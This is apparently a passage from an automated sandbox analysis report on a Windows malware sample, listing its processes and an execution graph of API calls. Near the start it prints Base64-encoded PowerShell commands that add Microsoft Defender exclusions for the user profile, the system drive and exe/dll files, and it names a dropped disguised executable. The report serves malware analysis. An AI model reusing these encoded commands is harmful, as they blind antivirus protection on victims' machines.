                                                        Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                                                        Imagebase:0x7ff619710000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        Target ID:35
                                                        Start time:22:11:13
                                                        Start date:24/03/2022
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
                                                        Imagebase:0x7ff619710000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        Target ID:36
                                                        Start time:22:11:26
                                                        Start date:24/03/2022
                                                        Path:C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe"
                                                        Imagebase:0xfe0000
                                                        File size:66560 bytes
                                                        MD5 hash:E2DD8887AEE175EF9BEFD87B2F6105B3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 30%, Virustotal, Browse
                                                        • Detection: 73%, ReversingLabs


                                                          Execution Graph

                                                          Execution Coverage:13.5%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:16.6%
                                                          Total number of Nodes:1315
                                                          Total number of Limit Nodes:17
3229 4039dd 3228->3229 3229->3226 3237 4039f9 lstrlenA 3229->3237 3241 405aba CharNextA 3229->3241 3230 403a50 LoadImageA 3232 403af6 3230->3232 3233 403a77 RegisterClassA 3230->3233 3231->3230 3234 40618a 17 API calls 3231->3234 3236 40140b 2 API calls 3232->3236 3235 403aad SystemParametersInfoA CreateWindowExA 3233->3235 3267 40365e 3233->3267 3234->3230 3235->3232 3240 403afc 3236->3240 3238 403a07 lstrcmpiA 3237->3238 3239 403a2d 3237->3239 3238->3239 3243 403a17 GetFileAttributesA 3238->3243 3244 405a8f 3 API calls 3239->3244 3246 403bcf 18 API calls 3240->3246 3240->3267 3242 4039f7 3241->3242 3242->3237 3245 403a23 3243->3245 3247 403a33 3244->3247 3245->3239 3248 405ad6 2 API calls 3245->3248 3249 403b0d 3246->3249 3351 4060f7 lstrcpynA 3247->3351 3248->3239 3251 403b19 ShowWindow 3249->3251 3252 403b9c 3249->3252 3254 406492 3 API calls 3251->3254 3352 4052f0 OleInitialize 3252->3352 3256 403b31 3254->3256 3255 403ba2 3257 403ba6 3255->3257 3258 403bbe 3255->3258 3259 403b3f GetClassInfoA 3256->3259 3263 406492 3 API calls 3256->3263 3265 40140b 2 API calls 3257->3265 3257->3267 3262 40140b 2 API calls 3258->3262 3260 403b53 GetClassInfoA RegisterClassA 3259->3260 3261 403b69 DialogBoxParamA 3259->3261 3260->3261 3264 40140b 2 API calls 3261->3264 3262->3267 3263->3259 3266 403b91 3264->3266 3265->3267 3266->3267 3267->3106 3268->3093 3269->3141 3270->3109 3272 405828 3271->3272 3273 403686 ExitProcess 3272->3273 3274 40583c MessageBoxIndirectA 3272->3274 3274->3273 3276 406500 5 API calls 3275->3276 3277 403693 lstrcatA 3276->3277 3277->3134 3277->3135 3279 4036d5 3278->3279 3280 405735 GetLastError 3278->3280 3279->3146 3280->3279 3281 405744 SetFileSecurityA 3280->3281 3281->3279 3282 40575a GetLastError 3281->3282 3282->3279 3284 405771 3283->3284 3285 405775 GetLastError 3283->3285 3284->3146 3285->3284 3286->3147 3287->3159 3289 4057d5 3288->3289 3290 4057c9 CloseHandle 3288->3290 3289->3159 3290->3289 3292 401389 2 API calls 3291->3292 3293 401420 
3292->3293 3293->3112 3295 405cca GetTickCount GetTempFileNameA 3294->3295 3296 403346 3295->3296 3297 405cf7 3295->3297 3296->3095 3297->3295 3297->3296 3298->3185 3299->3187 3300->3191 3302 402e46 3301->3302 3303 402e5e 3301->3303 3306 402e56 3302->3306 3307 402e4f DestroyWindow 3302->3307 3304 402e66 3303->3304 3305 402e6e GetTickCount 3303->3305 3337 40653c 3304->3337 3309 402e7c CreateDialogParamA ShowWindow 3305->3309 3310 402e9f 3305->3310 3306->3195 3307->3306 3309->3310 3310->3195 3312->3201 3314 4030ee 3313->3314 3315 40311c 3314->3315 3341 403300 SetFilePointer 3314->3341 3317 4032ea ReadFile 3315->3317 3318 403127 3317->3318 3319 403283 3318->3319 3320 403139 GetTickCount 3318->3320 3327 403072 3318->3327 3321 4032c5 3319->3321 3326 403287 3319->3326 3320->3327 3332 403188 3320->3332 3322 4032ea ReadFile 3321->3322 3322->3327 3323 4032ea ReadFile 3323->3332 3324 4032ea ReadFile 3324->3326 3325 405d37 WriteFile 3325->3326 3326->3324 3326->3325 3326->3327 3327->3205 3327->3210 3328 4031de GetTickCount 3328->3332 3329 403203 MulDiv wsprintfA 3330 40521e 24 API calls 3329->3330 3330->3332 3331 405d37 WriteFile 3331->3332 3332->3323 3332->3327 3332->3328 3332->3329 3332->3331 3334 405d08 ReadFile 3333->3334 3335 4032fd 3334->3335 3335->3193 3336->3203 3338 406559 PeekMessageA 3337->3338 3339 402e6c 3338->3339 3340 40654f DispatchMessageA 3338->3340 3339->3195 3340->3338 3341->3315 3342->3219 3344 403be3 3343->3344 3359 406055 wsprintfA 3344->3359 3346 403c54 3360 403c88 3346->3360 3348 40398f 3348->3224 3349 403c59 3349->3348 3350 40618a 17 API calls 3349->3350 3350->3349 3351->3226 3363 4041c7 3352->3363 3354 405313 3358 40533a 3354->3358 3366 401389 3354->3366 3355 4041c7 SendMessageA 3356 40534c OleUninitialize 3355->3356 3356->3255 3358->3355 3359->3346 3361 40618a 17 API calls 3360->3361 3362 403c96 SetWindowTextA 3361->3362 3362->3349 3364 4041d0 SendMessageA 3363->3364 3365 4041df 3363->3365 3364->3365 3365->3354 3368 401390 3366->3368 3367 4013fe 
3367->3354 3368->3367 3369 4013cb MulDiv SendMessageA 3368->3369 3369->3368 3515 4038c8 3516 4038d3 3515->3516 3517 4038d7 3516->3517 3518 4038da GlobalAlloc 3516->3518 3518->3517 3522 401fcb 3523 402bce 17 API calls 3522->3523 3524 401fd2 3523->3524 3525 40646b 2 API calls 3524->3525 3526 401fd8 3525->3526 3528 401fea 3526->3528 3529 406055 wsprintfA 3526->3529 3529->3528 3530 4014d6 3531 402bac 17 API calls 3530->3531 3532 4014dc Sleep 3531->3532 3534 402a5a 3532->3534 3370 401759 3409 402bce 3370->3409 3372 401760 3373 401786 3372->3373 3374 40177e 3372->3374 3417 4060f7 lstrcpynA 3373->3417 3416 4060f7 lstrcpynA 3374->3416 3377 401791 3379 405a8f 3 API calls 3377->3379 3378 401784 3381 4063d2 5 API calls 3378->3381 3380 401797 lstrcatA 3379->3380 3380->3378 3386 4017a3 3381->3386 3382 4017ae 3383 40646b 2 API calls 3382->3383 3382->3386 3387 4017ba CompareFileTime 3382->3387 3383->3382 3385 405c6b 2 API calls 3385->3386 3386->3382 3386->3385 3388 40187e 3386->3388 3393 4060f7 lstrcpynA 3386->3393 3396 40618a 17 API calls 3386->3396 3405 405813 MessageBoxIndirectA 3386->3405 3407 401855 3386->3407 3415 405c90 GetFileAttributesA CreateFileA 3386->3415 3387->3382 3389 40521e 24 API calls 3388->3389 3391 401888 3389->3391 3390 40521e 24 API calls 3408 40186a 3390->3408 3392 4030d8 31 API calls 3391->3392 3394 40189b 3392->3394 3393->3386 3395 4018af SetFileTime 3394->3395 3397 4018c1 FindCloseChangeNotification 3394->3397 3395->3397 3396->3386 3398 4018d2 3397->3398 3397->3408 3399 4018d7 3398->3399 3400 4018ea 3398->3400 3401 40618a 17 API calls 3399->3401 3402 40618a 17 API calls 3400->3402 3403 4018df lstrcatA 3401->3403 3404 4018f2 3402->3404 3403->3404 3406 405813 MessageBoxIndirectA 3404->3406 3405->3386 3406->3408 3407->3390 3407->3408 3410 402bda 3409->3410 3411 40618a 17 API calls 3410->3411 3412 402bfb 3411->3412 3413 402c07 3412->3413 3414 4063d2 5 API calls 3412->3414 3413->3372 3414->3413 3415->3386 3416->3378 3417->3377 3535 401959 3536 402bac 17 API 
calls 3535->3536 3537 401960 3536->3537 3538 402bac 17 API calls 3537->3538 3539 40196d 3538->3539 3540 402bce 17 API calls 3539->3540 3541 401984 lstrlenA 3540->3541 3543 401994 3541->3543 3542 4019d4 3543->3542 3547 4060f7 lstrcpynA 3543->3547 3545 4019c4 3545->3542 3546 4019c9 lstrlenA 3545->3546 3546->3542 3547->3545 3548 40535c 3549 405507 3548->3549 3550 40537e GetDlgItem GetDlgItem GetDlgItem 3548->3550 3552 40550f GetDlgItem CreateThread CloseHandle 3549->3552 3555 405537 3549->3555 3593 4041b0 SendMessageA 3550->3593 3552->3555 3553 4053ee 3560 4053f5 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3553->3560 3554 405565 3558 4055c0 3554->3558 3562 405575 3554->3562 3563 405599 ShowWindow 3554->3563 3555->3554 3556 405586 3555->3556 3557 40554d ShowWindow ShowWindow 3555->3557 3559 4041e2 8 API calls 3556->3559 3595 4041b0 SendMessageA 3557->3595 3558->3556 3569 4055cd SendMessageA 3558->3569 3564 405592 3559->3564 3567 405463 3560->3567 3568 405447 SendMessageA SendMessageA 3560->3568 3596 404154 3562->3596 3565 4055b9 3563->3565 3566 4055ab 3563->3566 3572 404154 SendMessageA 3565->3572 3571 40521e 24 API calls 3566->3571 3573 405476 3567->3573 3574 405468 SendMessageA 3567->3574 3568->3567 3569->3564 3575 4055e6 CreatePopupMenu 3569->3575 3571->3565 3572->3558 3577 40417b 18 API calls 3573->3577 3574->3573 3576 40618a 17 API calls 3575->3576 3578 4055f6 AppendMenuA 3576->3578 3579 405486 3577->3579 3580 405614 GetWindowRect 3578->3580 3581 405627 TrackPopupMenu 3578->3581 3582 4054c3 GetDlgItem SendMessageA 3579->3582 3583 40548f ShowWindow 3579->3583 3580->3581 3581->3564 3584 405643 3581->3584 3582->3564 3587 4054ea SendMessageA SendMessageA 3582->3587 3585 4054b2 3583->3585 3586 4054a5 ShowWindow 3583->3586 3588 405662 SendMessageA 3584->3588 3594 4041b0 SendMessageA 3585->3594 3586->3585 3587->3564 3588->3588 3589 40567f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3588->3589 3591 4056a1 SendMessageA 3589->3591 3591->3591 3592 4056c3 
GlobalUnlock SetClipboardData CloseClipboard 3591->3592 3592->3564 3593->3553 3594->3582 3595->3554 3597 404161 SendMessageA 3596->3597 3598 40415b 3596->3598 3597->3556 3598->3597 3599 40275d 3600 402763 3599->3600 3601 402a5a 3600->3601 3602 40276b FindClose 3600->3602 3602->3601 3603 40495e 3604 40498a 3603->3604 3605 40496e 3603->3605 3607 404990 SHGetPathFromIDListA 3604->3607 3608 4049bd 3604->3608 3614 4057f7 GetDlgItemTextA 3605->3614 3610 4049a0 3607->3610 3611 4049a7 SendMessageA 3607->3611 3609 40497b SendMessageA 3609->3604 3612 40140b 2 API calls 3610->3612 3611->3608 3612->3611 3614->3609 3615 401a5e 3616 402bac 17 API calls 3615->3616 3617 401a67 3616->3617 3618 402bac 17 API calls 3617->3618 3619 401a0e 3618->3619 3620 4029de 3621 406500 5 API calls 3620->3621 3622 4029e5 3621->3622 3623 402bce 17 API calls 3622->3623 3624 4029ee 3623->3624 3626 402a2a 3624->3626 3630 40614a 3624->3630 3627 4029fc 3627->3626 3634 406134 3627->3634 3631 406155 3630->3631 3632 406178 IIDFromString 3631->3632 3633 406171 3631->3633 3632->3627 3633->3627 3637 406119 WideCharToMultiByte 3634->3637 3636 402a1d CoTaskMemFree 3636->3626 3637->3636 3638 4027df 3639 402bce 17 API calls 3638->3639 3641 4027ed 3639->3641 3640 402803 3643 405c6b 2 API calls 3640->3643 3641->3640 3642 402bce 17 API calls 3641->3642 3642->3640 3644 402809 3643->3644 3666 405c90 GetFileAttributesA CreateFileA 3644->3666 3646 402816 3647 402822 GlobalAlloc 3646->3647 3648 4028bf 3646->3648 3649 4028b6 CloseHandle 3647->3649 3650 40283b 3647->3650 3651 4028c7 DeleteFileA 3648->3651 3652 4028da 3648->3652 3649->3648 3667 403300 SetFilePointer 3650->3667 3651->3652 3654 402841 3655 4032ea ReadFile 3654->3655 3656 40284a GlobalAlloc 3655->3656 3657 402894 3656->3657 3658 40285a 3656->3658 3659 405d37 WriteFile 3657->3659 3660 4030d8 31 API calls 3658->3660 3661 4028a0 GlobalFree 3659->3661 3663 402867 3660->3663 3662 4030d8 31 API calls 3661->3662 3664 4028b3 3662->3664 3665 40288b GlobalFree 3663->3665 
3664->3649 3665->3657 3666->3646 3667->3654 3668 4023e0 3669 402bce 17 API calls 3668->3669 3670 4023f1 3669->3670 3671 402bce 17 API calls 3670->3671 3672 4023fa 3671->3672 3673 402bce 17 API calls 3672->3673 3674 402404 GetPrivateProfileStringA 3673->3674 3675 4028e0 3676 402bac 17 API calls 3675->3676 3677 4028e6 3676->3677 3678 402925 3677->3678 3679 40290e 3677->3679 3684 4027bf 3677->3684 3682 40293f 3678->3682 3683 40292f 3678->3683 3680 402922 3679->3680 3681 402913 3679->3681 3680->3684 3690 406055 wsprintfA 3680->3690 3689 4060f7 lstrcpynA 3681->3689 3686 40618a 17 API calls 3682->3686 3685 402bac 17 API calls 3683->3685 3685->3680 3686->3680 3689->3684 3690->3684 3691 401b63 3692 402bce 17 API calls 3691->3692 3693 401b6a 3692->3693 3694 402bac 17 API calls 3693->3694 3695 401b73 wsprintfA 3694->3695 3696 402a5a 3695->3696 3697 401d65 3698 401d78 GetDlgItem 3697->3698 3699 401d6b 3697->3699 3701 401d72 3698->3701 3700 402bac 17 API calls 3699->3700 3700->3701 3702 401db9 GetClientRect LoadImageA SendMessageA 3701->3702 3703 402bce 17 API calls 3701->3703 3705 401e1a 3702->3705 3707 401e26 3702->3707 3703->3702 3706 401e1f DeleteObject 3705->3706 3705->3707 3706->3707 3708 4042e6 3709 4042fc 3708->3709 3714 404408 3708->3714 3712 40417b 18 API calls 3709->3712 3710 404477 3711 404541 3710->3711 3713 404481 GetDlgItem 3710->3713 3720 4041e2 8 API calls 3711->3720 3715 404352 3712->3715 3716 404497 3713->3716 3717 4044ff 3713->3717 3714->3710 3714->3711 3718 40444c GetDlgItem SendMessageA 3714->3718 3719 40417b 18 API calls 3715->3719 3716->3717 3724 4044bd SendMessageA LoadCursorA SetCursor 3716->3724 3717->3711 3721 404511 3717->3721 3741 40419d EnableWindow 3718->3741 3723 40435f CheckDlgButton 3719->3723 3731 40453c 3720->3731 3726 404517 SendMessageA 3721->3726 3727 404528 3721->3727 3739 40419d EnableWindow 3723->3739 3745 40458a 3724->3745 3726->3727 3727->3731 3732 40452e SendMessageA 3727->3732 3728 404472 3742 404566 3728->3742 3732->3731 3734 
40437d GetDlgItem 3740 4041b0 SendMessageA 3734->3740 3736 404393 SendMessageA 3737 4043b1 GetSysColor 3736->3737 3738 4043ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3736->3738 3737->3738 3738->3731 3739->3734 3740->3736 3741->3728 3743 404574 3742->3743 3744 404579 SendMessageA 3742->3744 3743->3744 3744->3710 3748 4057d9 ShellExecuteExA 3745->3748 3747 4044f0 LoadCursorA SetCursor 3747->3717 3748->3747 3749 40166a 3750 402bce 17 API calls 3749->3750 3751 401671 3750->3751 3752 402bce 17 API calls 3751->3752 3753 40167a 3752->3753 3754 402bce 17 API calls 3753->3754 3755 401683 MoveFileA 3754->3755 3756 401696 3755->3756 3757 40168f 3755->3757 3758 40646b 2 API calls 3756->3758 3761 4022e2 3756->3761 3759 401423 24 API calls 3757->3759 3760 4016a5 3758->3760 3759->3761 3760->3761 3762 405ed6 36 API calls 3760->3762 3762->3757 3763 40216b 3764 402bce 17 API calls 3763->3764 3765 402172 3764->3765 3766 402bce 17 API calls 3765->3766 3767 40217c 3766->3767 3768 402bce 17 API calls 3767->3768 3769 402186 3768->3769 3770 402bce 17 API calls 3769->3770 3771 402193 3770->3771 3772 402bce 17 API calls 3771->3772 3773 40219d 3772->3773 3774 4021df CoCreateInstance 3773->3774 3775 402bce 17 API calls 3773->3775 3778 4021fe 3774->3778 3780 4022ac 3774->3780 3775->3774 3776 401423 24 API calls 3777 4022e2 3776->3777 3779 40228c MultiByteToWideChar 3778->3779 3778->3780 3779->3780 3780->3776 3780->3777 3781 4022eb 3782 402bce 17 API calls 3781->3782 3783 4022f1 3782->3783 3784 402bce 17 API calls 3783->3784 3785 4022fa 3784->3785 3786 402bce 17 API calls 3785->3786 3787 402303 3786->3787 3788 40646b 2 API calls 3787->3788 3789 40230c 3788->3789 3790 40231d lstrlenA lstrlenA 3789->3790 3794 402310 3789->3794 3792 40521e 24 API calls 3790->3792 3791 40521e 24 API calls 3795 402318 3791->3795 3793 402359 SHFileOperationA 3792->3793 3793->3794 3793->3795 3794->3791 3794->3795 3796 40236d 3797 402374 3796->3797 3801 402387 3796->3801 3798 40618a 17 API calls 
3797->3798 3799 402381 3798->3799 3800 405813 MessageBoxIndirectA 3799->3800 3800->3801 3802 40266d 3803 402bac 17 API calls 3802->3803 3804 402677 3803->3804 3805 405d08 ReadFile 3804->3805 3806 4026e7 3804->3806 3808 4026f7 3804->3808 3810 4026e5 3804->3810 3805->3804 3811 406055 wsprintfA 3806->3811 3809 40270d SetFilePointer 3808->3809 3808->3810 3809->3810 3811->3810 3812 4019ed 3813 402bce 17 API calls 3812->3813 3814 4019f4 3813->3814 3815 402bce 17 API calls 3814->3815 3816 4019fd 3815->3816 3817 401a04 lstrcmpiA 3816->3817 3818 401a16 lstrcmpA 3816->3818 3819 401a0a 3817->3819 3818->3819 3820 40296e 3821 402bac 17 API calls 3820->3821 3822 402974 3821->3822 3823 4029af 3822->3823 3825 4027bf 3822->3825 3826 402986 3822->3826 3824 40618a 17 API calls 3823->3824 3823->3825 3824->3825 3826->3825 3828 406055 wsprintfA 3826->3828 3828->3825 3829 4014f4 SetForegroundWindow 3830 402a5a 3829->3830 3831 402476 3832 402bce 17 API calls 3831->3832 3833 402488 3832->3833 3834 402bce 17 API calls 3833->3834 3835 402492 3834->3835 3848 402c5e 3835->3848 3838 402a5a 3839 4024c7 3841 4024d3 3839->3841 3844 402bac 17 API calls 3839->3844 3840 402bce 17 API calls 3843 4024c0 lstrlenA 3840->3843 3842 4024f5 RegSetValueExA 3841->3842 3845 4030d8 31 API calls 3841->3845 3846 40250b RegCloseKey 3842->3846 3843->3839 3844->3841 3845->3842 3846->3838 3849 402c79 3848->3849 3852 405fab 3849->3852 3853 405fba 3852->3853 3854 4024a2 3853->3854 3855 405fc5 RegCreateKeyExA 3853->3855 3854->3838 3854->3839 3854->3840 3855->3854 3856 402777 3857 40277d 3856->3857 3858 402781 FindNextFileA 3857->3858 3860 402793 3857->3860 3859 4027d2 3858->3859 3858->3860 3862 4060f7 lstrcpynA 3859->3862 3862->3860 3863 401ef9 3864 402bce 17 API calls 3863->3864 3865 401eff 3864->3865 3866 402bce 17 API calls 3865->3866 3867 401f08 3866->3867 3868 402bce 17 API calls 3867->3868 3869 401f11 3868->3869 3870 402bce 17 API calls 3869->3870 3871 401f1a 3870->3871 3872 401423 24 API calls 3871->3872 3873 
401f21 3872->3873 3880 4057d9 ShellExecuteExA 3873->3880 3875 401f5c 3876 406575 5 API calls 3875->3876 3877 4027bf 3875->3877 3878 401f76 CloseHandle 3876->3878 3878->3877 3880->3875 3422 401f7b 3423 402bce 17 API calls 3422->3423 3424 401f81 3423->3424 3425 40521e 24 API calls 3424->3425 3426 401f8b 3425->3426 3427 405796 2 API calls 3426->3427 3428 401f91 3427->3428 3429 401fb2 CloseHandle 3428->3429 3433 4027bf 3428->3433 3437 406575 WaitForSingleObject 3428->3437 3429->3433 3432 401fa6 3434 401fb4 3432->3434 3435 401fab 3432->3435 3434->3429 3442 406055 wsprintfA 3435->3442 3438 40658f 3437->3438 3439 4065a1 GetExitCodeProcess 3438->3439 3440 40653c 2 API calls 3438->3440 3439->3432 3441 406596 WaitForSingleObject 3440->3441 3441->3438 3442->3429 3881 401ffb 3882 402bce 17 API calls 3881->3882 3883 402002 3882->3883 3884 406500 5 API calls 3883->3884 3885 402011 3884->3885 3886 402029 GlobalAlloc 3885->3886 3887 402091 3885->3887 3886->3887 3888 40203d 3886->3888 3889 406500 5 API calls 3888->3889 3890 402044 3889->3890 3891 406500 5 API calls 3890->3891 3892 40204e 3891->3892 3892->3887 3896 406055 wsprintfA 3892->3896 3894 402085 3897 406055 wsprintfA 3894->3897 3896->3894 3897->3887 3898 4018fd 3899 401934 3898->3899 3900 402bce 17 API calls 3899->3900 3901 401939 3900->3901 3902 4058bf 67 API calls 3901->3902 3903 401942 3902->3903 3904 401000 3905 401037 BeginPaint GetClientRect 3904->3905 3906 40100c DefWindowProcA 3904->3906 3908 4010f3 3905->3908 3911 401179 3906->3911 3909 401073 CreateBrushIndirect FillRect DeleteObject 3908->3909 3910 4010fc 3908->3910 3909->3908 3912 401102 CreateFontIndirectA 3910->3912 3913 401167 EndPaint 3910->3913 3912->3913 3914 401112 6 API calls 3912->3914 3913->3911 3914->3913 3915 401900 3916 402bce 17 API calls 3915->3916 3917 401907 3916->3917 3918 405813 MessageBoxIndirectA 3917->3918 3919 401910 3918->3919 3920 404b80 GetDlgItem GetDlgItem 3921 404bd6 7 API calls 3920->3921 3928 404dfd 3920->3928 3922 404c72 
SendMessageA 3921->3922 3923 404c7e DeleteObject 3921->3923 3922->3923 3924 404c89 3923->3924 3926 404cc0 3924->3926 3929 40618a 17 API calls 3924->3929 3925 404edf 3927 404f8b 3925->3927 3937 404f38 SendMessageA 3925->3937 3963 404df0 3925->3963 3930 40417b 18 API calls 3926->3930 3933 404f95 SendMessageA 3927->3933 3934 404f9d 3927->3934 3928->3925 3932 404e6c 3928->3932 3974 404ace SendMessageA 3928->3974 3935 404ca2 SendMessageA SendMessageA 3929->3935 3931 404cd4 3930->3931 3936 40417b 18 API calls 3931->3936 3932->3925 3938 404ed1 SendMessageA 3932->3938 3933->3934 3944 404fb6 3934->3944 3945 404faf ImageList_Destroy 3934->3945 3949 404fc6 3934->3949 3935->3924 3952 404ce5 3936->3952 3942 404f4d SendMessageA 3937->3942 3937->3963 3938->3925 3939 4041e2 8 API calls 3943 40518b 3939->3943 3941 40513f 3950 405151 ShowWindow GetDlgItem ShowWindow 3941->3950 3941->3963 3948 404f60 3942->3948 3946 404fbf GlobalFree 3944->3946 3944->3949 3945->3944 3946->3949 3947 404dbf GetWindowLongA SetWindowLongA 3951 404dd8 3947->3951 3957 404f71 SendMessageA 3948->3957 3949->3941 3967 405001 3949->3967 3979 404b4e 3949->3979 3950->3963 3953 404df5 3951->3953 3954 404ddd ShowWindow 3951->3954 3952->3947 3956 404d37 SendMessageA 3952->3956 3958 404dba 3952->3958 3960 404d75 SendMessageA 3952->3960 3961 404d89 SendMessageA 3952->3961 3973 4041b0 SendMessageA 3953->3973 3972 4041b0 SendMessageA 3954->3972 3956->3952 3957->3927 3958->3947 3958->3951 3960->3952 3961->3952 3963->3939 3964 40510b 3965 405115 InvalidateRect 3964->3965 3968 405121 3964->3968 3965->3968 3966 40502f SendMessageA 3969 405045 3966->3969 3967->3966 3967->3969 3968->3941 3988 404a89 3968->3988 3969->3964 3971 4050b9 SendMessageA SendMessageA 3969->3971 3971->3969 3972->3963 3973->3928 3975 404af1 GetMessagePos ScreenToClient SendMessageA 3974->3975 3976 404b2d SendMessageA 3974->3976 3977 404b25 3975->3977 3978 404b2a 3975->3978 3976->3977 3977->3932 3978->3976 3991 4060f7 lstrcpynA 3979->3991 3981 404b61 
3992 406055 wsprintfA 3981->3992 3983 404b6b 3984 40140b 2 API calls 3983->3984 3985 404b74 3984->3985 3993 4060f7 lstrcpynA 3985->3993 3987 404b7b 3987->3967 3994 4049c4 3988->3994 3990 404a9e 3990->3941 3991->3981 3992->3983 3993->3987 3995 4049da 3994->3995 3996 40618a 17 API calls 3995->3996 3997 404a3e 3996->3997 3998 40618a 17 API calls 3997->3998 3999 404a49 3998->3999 4000 40618a 17 API calls 3999->4000 4001 404a5f lstrlenA wsprintfA SetDlgItemTextA 4000->4001 4001->3990 4002 401502 4003 40150a 4002->4003 4005 40151d 4002->4005 4004 402bac 17 API calls 4003->4004 4004->4005 4006 402604 4007 402bce 17 API calls 4006->4007 4008 40260b 4007->4008 4011 405c90 GetFileAttributesA CreateFileA 4008->4011 4010 402617 4011->4010 4012 401b87 4013 401b94 4012->4013 4014 401bd8 4012->4014 4015 401c1c 4013->4015 4020 401bab 4013->4020 4016 401c01 GlobalAlloc 4014->4016 4017 401bdc 4014->4017 4018 40618a 17 API calls 4015->4018 4026 402387 4015->4026 4019 40618a 17 API calls 4016->4019 4017->4026 4033 4060f7 lstrcpynA 4017->4033 4022 402381 4018->4022 4019->4015 4031 4060f7 lstrcpynA 4020->4031 4027 405813 MessageBoxIndirectA 4022->4027 4024 401bee GlobalFree 4024->4026 4025 401bba 4032 4060f7 lstrcpynA 4025->4032 4027->4026 4029 401bc9 4034 4060f7 lstrcpynA 4029->4034 4031->4025 4032->4029 4033->4024 4034->4026 4035 402588 4045 402c0e 4035->4045 4038 402bac 17 API calls 4039 40259b 4038->4039 4040 4027bf 4039->4040 4041 4025c2 RegEnumValueA 4039->4041 4042 4025b6 RegEnumKeyA 4039->4042 4043 4025d7 RegCloseKey 4041->4043 4042->4043 4043->4040 4046 402bce 17 API calls 4045->4046 4047 402c25 4046->4047 4048 405f7d RegOpenKeyExA 4047->4048 4049 402592 4048->4049 4049->4038 3418 401389 3420 401390 3418->3420 3419 4013fe 3420->3419 3421 4013cb MulDiv SendMessageA 3420->3421 3421->3420 4050 40460d 4051 404639 4050->4051 4052 40464a 4050->4052 4111 4057f7 GetDlgItemTextA 4051->4111 4054 404656 GetDlgItem 4052->4054 4087 4046b5 4052->4087 4058 40466a 4054->4058 4055 404644 4057 
4063d2 5 API calls 4055->4057 4056 404799 4059 404943 4056->4059 4113 4057f7 GetDlgItemTextA 4056->4113 4057->4052 4061 40467e SetWindowTextA 4058->4061 4066 405b28 4 API calls 4058->4066 4065 4041e2 8 API calls 4059->4065 4064 40417b 18 API calls 4061->4064 4062 4047c9 4067 405b7d 18 API calls 4062->4067 4063 40618a 17 API calls 4068 404729 SHBrowseForFolderA 4063->4068 4069 40469a 4064->4069 4070 404957 4065->4070 4071 404674 4066->4071 4072 4047cf 4067->4072 4068->4056 4073 404741 CoTaskMemFree 4068->4073 4074 40417b 18 API calls 4069->4074 4071->4061 4075 405a8f 3 API calls 4071->4075 4114 4060f7 lstrcpynA 4072->4114 4076 405a8f 3 API calls 4073->4076 4077 4046a8 4074->4077 4075->4061 4078 40474e 4076->4078 4112 4041b0 SendMessageA 4077->4112 4081 404785 SetDlgItemTextA 4078->4081 4086 40618a 17 API calls 4078->4086 4081->4056 4082 4046ae 4084 406500 5 API calls 4082->4084 4083 4047e6 4085 406500 5 API calls 4083->4085 4084->4087 4094 4047ed 4085->4094 4088 40476d lstrcmpiA 4086->4088 4087->4056 4087->4059 4087->4063 4088->4081 4091 40477e lstrcatA 4088->4091 4089 404829 4115 4060f7 lstrcpynA 4089->4115 4091->4081 4092 404830 4093 405b28 4 API calls 4092->4093 4095 404836 GetDiskFreeSpaceA 4093->4095 4094->4089 4097 405ad6 2 API calls 4094->4097 4099 404881 4094->4099 4098 40485a MulDiv 4095->4098 4095->4099 4097->4094 4098->4099 4100 4048f2 4099->4100 4101 404a89 20 API calls 4099->4101 4102 404915 4100->4102 4103 40140b 2 API calls 4100->4103 4104 4048df 4101->4104 4116 40419d EnableWindow 4102->4116 4103->4102 4106 4048f4 SetDlgItemTextA 4104->4106 4107 4048e4 4104->4107 4106->4100 4109 4049c4 20 API calls 4107->4109 4108 404931 4108->4059 4110 404566 SendMessageA 4108->4110 4109->4100 4110->4059 4111->4055 4112->4082 4113->4062 4114->4083 4115->4092 4116->4108 4117 401490 4118 40521e 24 API calls 4117->4118 4119 401497 4118->4119 4120 405192 4121 4051a2 4120->4121 4122 4051b6 4120->4122 4124 4051ff 4121->4124 4125 4051a8 4121->4125 4123 4051be 
